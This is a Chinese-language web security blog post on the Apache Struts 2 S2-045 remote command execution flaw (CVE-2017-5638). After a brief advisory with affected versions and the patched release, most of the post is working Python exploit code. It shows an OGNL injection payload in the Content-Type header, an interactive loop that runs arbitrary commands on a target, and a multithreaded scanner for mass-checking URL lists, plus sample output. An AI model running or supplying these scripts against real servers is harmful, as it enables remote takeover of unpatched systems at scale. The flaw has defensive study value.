發表於2017-03-07 | 分類於web安全 | 熱度℃
免責申明:文章中的工具等僅供個人測試研究,請在下載後24小時內删除,不得用於商業或非法用途,否則後果自負
Apache Struts 2被曝存在遠程命令執行漏洞,漏洞編號S2-045,CVE編號CVE-2017-5638,在使用基於Jakarta挿件的文件上傳功能時,有可能存在遠程命令執行,導致系統被駭客入侵,漏洞評級為:高危。漏洞詳情:惡意用戶可在上傳文件時通過修改HTTP請求頭中的Content-Type值來觸發該漏洞進而執行系統命令。風險等級:高風險。漏洞風險:駭客通過利用漏洞可以實現遠程命令執行。影響版本:Struts 2.3.5 - Struts 2.3.31,Struts 2.5 - Struts 2.5.10。安全版本:Struts 2.3.32或2.5.10.1。修復建議:如您正在使用Jakarta文件上傳挿件,請陞級Struts至安全版本。
更多參攷:https://cwiki.apache.org/confluence/display/WW/S2-045
POC
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
#!-*- encoding:utf-8 -*-
import urllib2
import sys
from poster.encode import multipart_encode
from poster.streaminghttp import register_openers
def poc(url):
register_openers()
datagen,header = multipart_encode({“image1”:open(“tmp.txt”,“rb”)})
header[“User-Agent”]=“Mozilla/5.0(Macintosh;Intel Mac OS X 10_12_3)AppleWebKit/537.36(KHTML,like Gecko)Chrome/56.0.2924.87 Safari/537.36”
header[“Content-Type”]=“%{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil =#container.getInstance(@[email protected])).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo nMask').(#iswin=(@[email protected]('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@[email protected]().getOutputStream())).(@ [email protected](#process.getInputStream(),#ros)).(#ros.flush())}“
request = urllib2.Request(url,datagen,headers=header)
response = urllib2.urlopen(request)
body=response.read()
return body
url=sys.argv[1]
body=poc(url)
if“nMask”in body:
print“[Loopholes exist]”,url
Poc_Cmd
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
import urllib2
import sys
from poster.encode import multipart_encode
from poster.streaminghttp import register_openers
def poc(url,content=“echo nMask”):
register_openers()
datagen,header = multipart_encode({“image1”:open(“tmp.txt”,“rb”)})
header[“User-Agent”]=“Mozilla/5.0(Macintosh;Intel Mac OS X 10_12_3)AppleWebKit/537.36(KHTML,like Gecko)Chrome/56.0.2924.87 Safari/537.36”
header[“Content-Type”]=“%{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil =#container.getInstance(@[email protected])).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='“+content+”').(#iswin=(@[email protected]('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/ c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@[email protected]().getOutputStream())).(@ [email protected](#process.getInputStream(),#ros)).(#ros.flush())}“
request = urllib2.Request(url,datagen,headers=header)
response = urllib2.urlopen(request)
body=response.read()
return body
url=sys.argv[1]
body=poc(url)
if“nMask”in body:
print“[Loopholes exist]”,url
while 1:
con=raw_input(“[cmd]>>”)
print poc(url,content=con)
運行結果:
1
2
3
4
5
6
7
>python s2_045_cmd.py http://xxx.com/?a.action
[Loopholes exist] http://xxx.com/?a.action
[cmd]>>ls
example1
example2
多執行緒批量檢測
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
import urllib2
from poster.encode import multipart_encode
from poster.streaminghttp import register_openers
import threading
def poc(url):
register_openers()
datagen,header = multipart_encode({“image1”:open(“tmp.txt”,“rb”)})
header[“User-Agent”]=“Mozilla/5.0(Macintosh;Intel Mac OS X 10_12_3)AppleWebKit/537.36(KHTML,like Gecko)Chrome/56.0.2924.87 Safari/537.36”
header[“Content-Type”]=“%{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil =#container.getInstance(@[email protected])).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo nMask').(#iswin=(@[email protected]('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@[email protected]().getOutputStream())).(@ [email protected](#process.getInputStream(),#ros)).(#ros.flush())}“
try:
request = urllib2.Request(url,datagen,headers=header)
response = urllib2.urlopen(request,timeout=5)
body=response.read()
except:
body=“”
if“nMask”in body:
print“[Loopholes exist]”,url
f.write(url+“\n”)
else:
print“Loopholes not exist”,url
if __name__==“__main__”:
'''
url.txt為待檢測url清單
result.txt為檢測完輸出結果檔案
'''
f=open(“result.txt”,“a”)
url_list=[i.replace(“\n”,“”)for i in open(“url.txt”,“r”).readlines()]
for url in url_list:
threading.Thread(target=poc,args=(url,)).start()
while 1:
if(len(threading.enumerate())<50):
break
POC下載地址:https://github.com/tengzhangchao/Struts2_045-Poc
傳送門
struts2-052漏洞struts2-046漏洞struts2_045漏洞struts2漏洞poc匯總
歡迎您掃一掃上面的微信公眾號,訂閱我的部落格!
熱門文章推薦: